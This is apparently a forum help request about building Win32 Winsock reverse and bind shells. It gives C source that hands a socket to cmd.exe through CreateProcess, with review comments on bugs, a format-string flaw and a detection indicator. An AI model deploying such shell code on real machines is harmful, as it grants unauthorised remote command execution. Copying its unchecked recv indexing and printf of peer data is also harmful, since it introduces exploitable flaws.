Hello, I would like to get a bind/reverse shell with Win32 Winsock.
By calling CreateProcess with STARTF_USESTDHANDLES, I got a reverse shell (client mode) as expected. However, I failed to get a bind shell (server mode) with the same approach.
What is the difference between client mode (reverse shell) and server mode (bind shell)? How can I get a bind shell?
Appreciate your help.
Regards,
What I have tried:
Here is the code for client mode (reverse shell): it worked as expected.
#include "stdafx.h"
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment(lib, "ws2_32.lib")
#define BUFFERLEN (1024)
// Launches `my_cmd` as a child process whose stdin, stdout and stderr are all
// the handle passed in `my_socket` (callers pass a SOCKET cast to void*).
// Returns 0 unconditionally: the CreateProcess result is never examined, so a
// failed launch is indistinguishable from a successful one.
int spawnShell(void *my_socket, char *my_cmd)
{
STARTUPINFO s_info = { 0 };
PROCESS_INFORMATION p_info;
s_info.cb = sizeof(s_info);
// wShowWindow is only honoured when STARTF_USESHOWWINDOW is present in
// dwFlags; dwFlags below sets STARTF_USESTDHANDLES alone, so SW_HIDE is ignored.
s_info.wShowWindow = SW_HIDE;
s_info.dwFlags = STARTF_USESTDHANDLES;
// All three standard handles refer to the same socket handle.
s_info.hStdInput = my_socket;
s_info.hStdOutput = my_socket;
s_info.hStdError = my_socket;
// bInheritHandles = TRUE is what allows the child to receive the handles above.
// NOTE(review): the return value is ignored and p_info.hProcess/hThread are
// never passed to CloseHandle, so each successful call leaks two handles.
// From a detection standpoint, a child process whose standard handles resolve
// to a socket rather than a console or pipe is a strong host-based indicator
// of this technique.
CreateProcess(NULL, my_cmd, NULL, NULL, TRUE, 0, NULL, NULL, (STARTUPINFO*)&s_info, &p_info);
return 0;
}
// Client mode: connects out to 127.0.0.1:22222, exchanges a greeting, then
// hands the connected socket to spawnShell as the child's standard handles.
int
main()
{
WSADATA wsaData;
struct sockaddr_in addr;
SOCKET sock;
int len;
char data[BUFFERLEN];
// None of the Winsock calls below have their return values checked; a failed
// WSASocket or connect still falls through to send/recv on an invalid socket.
WSAStartup(MAKEWORD(2, 2), &wsaData);
sock = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
// addr is not zero-initialised; only the three fields below are set.
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
addr.sin_port = htons(22222);
connect(sock, (SOCKADDR *)&addr, sizeof(addr));
send(sock, "HELLO\n", 6, 0);
len = recv(sock, data, BUFFERLEN, 0);
// Out-of-bounds write: recv returns SOCKET_ERROR (-1) on failure, which
// indexes data[-1], and returns BUFFERLEN when the buffer is full, which
// indexes data[BUFFERLEN], one past the end. Receiving at most BUFFERLEN - 1
// bytes and rejecting len < 0 would keep the terminator in bounds.
data[len] = '\0';
// Format-string vulnerability (CWE-134): data comes from the remote peer and
// is used directly as the printf format string. Should be printf("%s", data).
printf(data);
// The SOCKET is passed as a void* handle; main returns straight afterwards
// without calling closesocket or WSACleanup.
spawnShell((void *)sock, "cmd");
return 0;
}
And here is the code for server mode (bind shell): it did not work.
#include "stdafx.h"
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment(lib, "ws2_32.lib")
#define BUFFERLEN (1024)
// Launches `my_cmd` as a child process whose stdin, stdout and stderr are all
// the handle passed in `my_socket` (callers pass a SOCKET cast to void*).
// Returns 0 unconditionally: the CreateProcess result is never examined, so a
// failed launch is indistinguishable from a successful one.
int spawnShell(void *my_socket, char *my_cmd)
{
STARTUPINFO s_info = { 0 };
PROCESS_INFORMATION p_info;
s_info.cb = sizeof(s_info);
// wShowWindow is only honoured when STARTF_USESHOWWINDOW is present in
// dwFlags; dwFlags below sets STARTF_USESTDHANDLES alone, so SW_HIDE is ignored.
s_info.wShowWindow = SW_HIDE;
s_info.dwFlags = STARTF_USESTDHANDLES;
// All three standard handles refer to the same socket handle.
s_info.hStdInput = my_socket;
s_info.hStdOutput = my_socket;
s_info.hStdError = my_socket;
// bInheritHandles = TRUE is what allows the child to receive the handles above.
// NOTE(review): the return value is ignored and p_info.hProcess/hThread are
// never passed to CloseHandle, so each successful call leaks two handles.
// From a detection standpoint, a child process whose standard handles resolve
// to a socket rather than a console or pipe is a strong host-based indicator
// of this technique.
CreateProcess(NULL, my_cmd, NULL, NULL, TRUE, 0, NULL, NULL, (STARTUPINFO*)&s_info, &p_info);
return 0;
}
// Server mode: listens on every interface at TCP port 11111, accepts a single
// client, exchanges a greeting, then hands the accepted socket to spawnShell.
int
main()
{
WSADATA wsaData;
SOCKET sock0;
struct sockaddr_in addr;
struct sockaddr_in client;
SOCKET sock;
int len;
char data[BUFFERLEN];
// None of the Winsock calls below have their return values checked; a failed
// socket/bind/listen/accept still falls through to send/recv on an invalid socket.
WSAStartup(MAKEWORD(2, 0), &wsaData);
sock0 = socket(AF_INET, SOCK_STREAM, 0);
// addr is not zero-initialised; only the three fields below are set.
addr.sin_family = AF_INET;
addr.sin_port = htons(11111);
addr.sin_addr.S_un.S_addr = INADDR_ANY;
bind(sock0, (struct sockaddr *)&addr, sizeof(addr));
listen(sock0, 5);
// len serves as accept's in/out address length here and is reused as the
// recv byte count below.
len = sizeof(client);
// Blocks until a peer connects; an INVALID_SOCKET result is not checked.
sock = accept(sock0, (struct sockaddr *)&client, &len);
send(sock, "HELLO\n", 6, 0);
len = recv(sock, data, BUFFERLEN, 0);
// Out-of-bounds write: recv returns SOCKET_ERROR (-1) on failure, which
// indexes data[-1], and returns BUFFERLEN when the buffer is full, which
// indexes data[BUFFERLEN], one past the end. Receiving at most BUFFERLEN - 1
// bytes and rejecting len < 0 would keep the terminator in bounds.
data[len] = '\0';
// Format-string vulnerability (CWE-134): data comes from the remote peer and
// is used directly as the printf format string. Should be printf("%s", data).
printf(data);
spawnShell((void *)sock,"cmd");
// Only the accepted socket is closed; the listening socket sock0 is never
// closed before WSACleanup.
closesocket(sock);
WSACleanup();
return 0;
}